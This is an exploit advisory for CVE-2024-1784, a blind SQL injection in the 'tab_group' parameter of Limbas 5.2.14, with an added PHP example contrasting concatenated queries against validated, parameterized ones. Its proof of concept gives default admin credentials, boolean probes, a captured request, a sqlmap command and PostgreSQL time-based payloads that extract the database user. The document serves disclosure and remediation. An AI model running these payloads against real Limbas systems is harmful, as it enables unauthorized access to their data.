Limbas-Blind-SQL-injection

Exploit Title: Limbas-Blind-SQL-injection

Exploit Author: Lina Li

Version: 5.2.14

Tested on: Kali Linux + Apache 2.4.57 + PHP 8.2.13 (https://hub.docker.com/r/limbas/limbas)

CVE: CVE-2024-1784

Description:

After logging in (default credentials: admin/limbas), the "tab_group" parameter of the "/main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2" page is vulnerable to blind SQL injection. Defensive measures such as input validation or parameterized queries for the SQL statements are recommended. Exploiting this vulnerability could enable an attacker to take control of the application, alter or access data, or leverage recent vulnerabilities present in the underlying database. (Affected file: https://github.com/limbas/limbas/blob/master/src/limbas_src/main_admin.php)
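The following is an added example, not Limbas code, showing the two defences recommended above applied to a "tab_group" request parameter: a vulnerable concatenated query next to its hardened form with integer validation and a bound parameter. The table name example_tab_group, the function names and the sample rows are hypothetical; an in-memory SQLite connection stands in for PostgreSQL so the script runs offline, and the PDO calls are the same for a pgsql: DSN.

```php
<?php
declare(strict_types=1);

// Added example, not Limbas code. Table, function names and sample data are
// hypothetical; SQLite in memory is used here only so the script runs offline.

/**
 * Validate that a request parameter is a plain unsigned integer before it is
 * used anywhere near SQL. Values such as "1 and 1=1" are rejected here.
 */
function requireIntParam(array $query, string $name): int
{
    $raw = $query[$name] ?? null;
    if (!is_string($raw) || !preg_match('/^\d{1,9}\z/', $raw)) {
        throw new InvalidArgumentException("invalid value for parameter {$name}");
    }
    return (int) $raw;
}

/**
 * Vulnerable pattern: the raw parameter is concatenated into the SQL text, so
 * an appended condition changes the WHERE clause, and the number of rows
 * returned (hence the page content) reveals whether that condition was true.
 */
function fetchGroupVulnerable(PDO $db, string $tabGroup): array
{
    $sql = 'SELECT id, name FROM example_tab_group WHERE id = ' . $tabGroup;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

/**
 * Hardened pattern: the SQL text is fixed and the value is bound as an
 * integer parameter, so the database never parses user-supplied text as SQL.
 */
function fetchGroupSafe(PDO $db, int $tabGroup): array
{
    $stmt = $db->prepare('SELECT id, name FROM example_tab_group WHERE id = :id');
    $stmt->bindValue(':id', $tabGroup, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data on an in-memory database (assumption: Limbas itself
// runs on PostgreSQL, where the DSN would start with "pgsql:").
$db = new PDO('sqlite::memory:', null, null, [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);
$db->exec('CREATE TABLE example_tab_group (id INTEGER PRIMARY KEY, name TEXT NOT NULL)');
$db->exec("INSERT INTO example_tab_group (id, name) VALUES (1, 'default'), (2, 'admin')");

// The two probes from the advisory give different row counts against the
// concatenated query: that difference is the boolean oracle the finding relies on.
foreach (['1 AND 1=1', '1 AND 1=2'] as $probe) {
    printf("vulnerable, tab_group=%s: %d row(s)\n", $probe, count(fetchGroupVulnerable($db, $probe)));
}

// With validation in front of the parameterized query, only a bare integer
// reaches the database; both probes are refused before any SQL is built.
foreach (['1', '1 AND 1=1', '1 AND 1=2'] as $probe) {
    try {
        $id = requireIntParam(['tab_group' => $probe], 'tab_group');
        printf("hardened, tab_group=%s: %d row(s)\n", $probe, count(fetchGroupSafe($db, $id)));
    } catch (InvalidArgumentException $e) {
        printf("hardened, tab_group=%s: rejected (%s)\n", $probe, $e->getMessage());
    }
}
```

When the connection is to PostgreSQL, also pass PDO::ATTR_EMULATE_PREPARES => false in the constructor options so that statements are prepared server-side rather than interpolated client-side by the driver. The validator is a defence in depth on top of the bound parameter, not a replacement for it; the actual query text used by main_admin.php is not reproduced on this page.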

Proof of Concept:

After logging in, go to this address: localhost/main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2

  1. First, set "tab_group" to "1+and+1=1" (URL-encoded "1 and 1=1"); the response is normal.


  2. Then set "tab_group" to "1+and+1=2"; the response differs, which indicates a boolean-based blind injection.


  3. Use Burp Suite to intercept this request, then copy the request and paste it into a file named "sqlinjection.txt":
GET /main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: LMB_SESS_ID=h2i9p2if9lq5trnkmor49qs698
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

  4. Running sqlmap against the saved request extracts data successfully:
sqlmap -r sqlinjection.txt --batch --current-user

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tab_group (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=setup_gtab_ftype&group_bzm=&tab_group=1 AND 5959=5959&atid=2

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: action=setup_gtab_ftype&group_bzm=&tab_group=1 AND 4788=(SELECT 4788 FROM PG_SLEEP(5))&atid=2
---
[02:26:32] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian
web application technology: PHP 8.2.13, Apache 2.4.57
back-end DBMS: PostgreSQL
[02:26:32] [INFO] fetching current user
[02:26:32] [INFO] resumed: limbasuser
current user: 'limbasuser'
